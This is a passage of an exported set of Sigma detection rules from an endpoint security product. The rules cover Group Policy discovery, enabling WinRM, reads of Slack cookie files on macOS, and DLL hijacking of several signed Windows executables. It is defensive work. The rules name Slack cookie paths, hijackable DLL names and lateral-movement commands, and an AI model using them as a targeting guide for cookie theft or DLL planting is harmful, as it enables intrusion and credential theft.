'?:\\Users\\\\*\\WindowsPowerShell\\Modules\\GPOZaurr\\\\*\\GPOZaurr.psm1'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\**.ps1'\n\n exclusion_asbuildreport:\n PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Microsoft.AD\\\\*\\Get-AbrADOU.ps1'\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Microsoft.AD\\\\*\\Get-AbrADGPO.ps1'\n\n exclusion_tenable1:\n PowershellCommand|contains|all:\n - 'function Get-ExistingGpoId {'\n - '$installedGpoNames = @($GPODisplayName, \"Tenable for AD\", \"Alsid for AD\")'\n exclusion_tenable2:\n PowershellCommand|contains|all:\n - 'function Check-ExistingGpos {'\n - 'Write-Host \"[-] Checking whether IOA script is runnable.\"'\n exclusion_tenable3:\n PowershellCommand|contains|all:\n - 'function Uninstall-ByGpo {'\n - 'Write-Host \"[-] GPO name to be deployed: $CleaningGPODisplayName\"'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "729fe232-6628-4198-8f7f-d0a755c02c73",
"rule_name": "Group Policy Information Discovered via PowerShell",
"rule_description": "Detects the access to group policy information using Get-GPO PowerShell cmdlet.\nAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\nIt is recommended to investigate the process responsible for the GPO discovery to look for malicious content or other suspicious actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "72abdac0-7335-48c5-9b95-d61407043f00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621241Z",
"creation_date": "2026-03-23T11:45:34.621243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621247Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_enable_winrm_powershell.yml",
"content": "title: WinRM Enabled via PowerShell\nid: 72abdac0-7335-48c5-9b95-d61407043f00\ndescription: |\n Detects when Windows Remote Management (WinRM) is enabled via a PowerShell cmdlet.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to determine if this activity is legitimate by correlating any unusual authentications following this alert and to whitelist recurring configuration scripts.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Enable-PSRemoting'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/commands/CustomShellCommands.cs\n exclusion_function:\n PowershellCommand|contains|all:\n - 'function Enable-PSRemoting'\n - 'Enable-PSSessionConfiguration @PSBoundParameters'\n - '# Enable all Session Configurations'\n - '# first try to enable all the sessions'\n - '# Construct SID for network users'\n\n # https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/commands/CustomShellCommands.cs#L3994\n # Function Test-WinRMQuickConfigNeeded is used in Enable-PSRemoting to detect if Set-WSManQuickConfig needs to be run or not.\n exclusion_function_test:\n PowershellCommand|contains|all:\n - 'function Test-WinRMQuickConfigNeeded'\n - '# check if WinRM service is running'\n - '$winrmQuickConfigNeeded = Test-WinRMQuickConfigNeeded'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n\n exclusion_puppetlabs:\n ProcessParentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n ProcessCommandLine|contains: 'powershell.exe -executionPolicy bypass -command *confWinrmHttps.ps1 '\n\n exclusion_azure:\n - ProcessParentImage: '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - ProcessGrandparentImage: '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n\n exclusion_boxstarter:\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n PowershellScriptPath: '?:\\ProgramData\\Boxstarter\\Boxstarter.Chocolatey\\\\*.ps1'\n\n exclusion_ccm1:\n ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n exclusion_ccm2:\n ProcessParentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n PowershellScriptPath: '?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n\n exclusion_manageengine:\n ProcessCommandLine: '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n ProcessParentImage: '*\\bin\\wrapper.exe'\n\n exclusion_admincenter1:\n ProcessParentImage: '?:\\Program Files\\WindowsAdminCenter\\Service\\WindowsAdminCenterLauncher.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n exclusion_admincenter2:\n - ProcessProduct: 'Windows Admin Center (v2)'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n - ProcessGrandparentProduct: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n exclusion_admincenter3:\n PowershellScriptPath: '?:\\Program Files\\WindowsAdminCenter\\PowerShellModules\\Microsoft.WindowsAdminCenter.Configuration\\Microsoft.WindowsAdminCenter.Configuration.psm1'\n exclusion_admincenter4:\n ProcessCommandLine: 'Powershell.exe -WindowStyle Hidden -File ?:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\\\*.ps1'\n\n exclusion_ninjarmm:\n - ProcessGrandparentOriginalFileName: 'NinjaRMMAgent'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'NinjaOne LLC'\n - ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_wapt:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "72abdac0-7335-48c5-9b95-d61407043f00",
"rule_name": "WinRM Enabled via PowerShell",
"rule_description": "Detects when Windows Remote Management (WinRM) is enabled via a PowerShell cmdlet.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to determine if this activity is legitimate by correlating any unusual authentications following this alert and to whitelist recurring configuration scripts.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "72bb29dc-a52f-43a7-ab84-f003a519cd50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617660Z",
"creation_date": "2026-03-23T11:45:34.617662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617667Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1552_004_read_slack_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Slack Sensitive Files\nid: 72bb29dc-a52f-43a7-ab84-f003a519cd50\ndescription: |\n Detects a suspicious access to Slack files that hold cookies or sensitive files.\n Adversaries may steal Slack application cookies and use them to gain access to the application without needing credentials.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/Library/Application Support/Slack/Cookies'\n - '/Users/*/Library/Application Support/Slack/storage/*'\n - '/Users/*/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/storage/*'\n - '/Users/*/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/Cookies'\n ProcessImage|contains: '?'\n\n filter_slack:\n ProcessImage:\n - '/Applications/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Applications/Slack*.app/Contents/MacOS/Slack'\n - '/Users/*/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Users/*/Slack*.app/Contents/MacOS/Slack'\n - '/Volumes/Slack/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Volumes/Slack/Slack*.app/Contents/MacOS/Slack'\n - '/Volumes/Slack 1/Slack.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Volumes/Slack 1/Slack.app/Contents/MacOS/Slack'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_phpstorm:\n Image: '/users/*/applications/phpstorm.app/contents/macos/phpstorm'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.macpaw.CleanMyMac*'\n - 'com.macpaw.cmm-business'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "72bb29dc-a52f-43a7-ab84-f003a519cd50",
"rule_name": "Suspicious Access to Slack Sensitive Files",
"rule_description": "Detects a suspicious access to Slack files that hold cookies or sensitive files.\nAdversaries may steal Slack application cookies and use them to gain access to the application without needing credentials.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7306d88f-f220-4e1d-9f13-19a06e2466e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587199Z",
"creation_date": "2026-03-23T11:45:34.587203Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587211Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tttracer.yml",
"content": "title: DLL Hijacking via tttracer.exe\nid: 7306d88f-f220-4e1d-9f13-19a06e2466e0\ndescription: |\n Detects potential Windows DLL Hijacking via tttracer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tttracer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\TTDRecord.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7306d88f-f220-4e1d-9f13-19a06e2466e0",
"rule_name": "DLL Hijacking via tttracer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tttracer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "730f4da7-7e20-4f68-99bc-9f28d4c60594",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592313Z",
"creation_date": "2026-03-23T11:45:34.592316Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgedevtools.yml",
"content": "title: DLL Hijacking via microsoftedgedevtools.exe\nid: 730f4da7-7e20-4f68-99bc-9f28d4c60594\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgedevtools.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgedevtools.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "730f4da7-7e20-4f68-99bc-9f28d4c60594",
"rule_name": "DLL Hijacking via microsoftedgedevtools.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgedevtools.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "732a4632-5577-440f-8774-b143fe7bd868",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602410Z",
"creation_date": "2026-03-23T11:45:34.602414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602421Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpclip.yml",
"content": "title: DLL Hijacking via rdpclip.exe\nid: 732a4632-5577-440f-8774-b143fe7bd868\ndescription: |\n Detects potential Windows DLL Hijacking via rdpclip.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpclip.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\DEVOBJ.dll'\n - '\\dwmapi.dll'\n - '\\IPHLPAPI.DLL'\n - '\\mpr.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\PROPSYS.dll'\n - '\\srpapi.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "732a4632-5577-440f-8774-b143fe7bd868",
"rule_name": "DLL Hijacking via rdpclip.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpclip.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
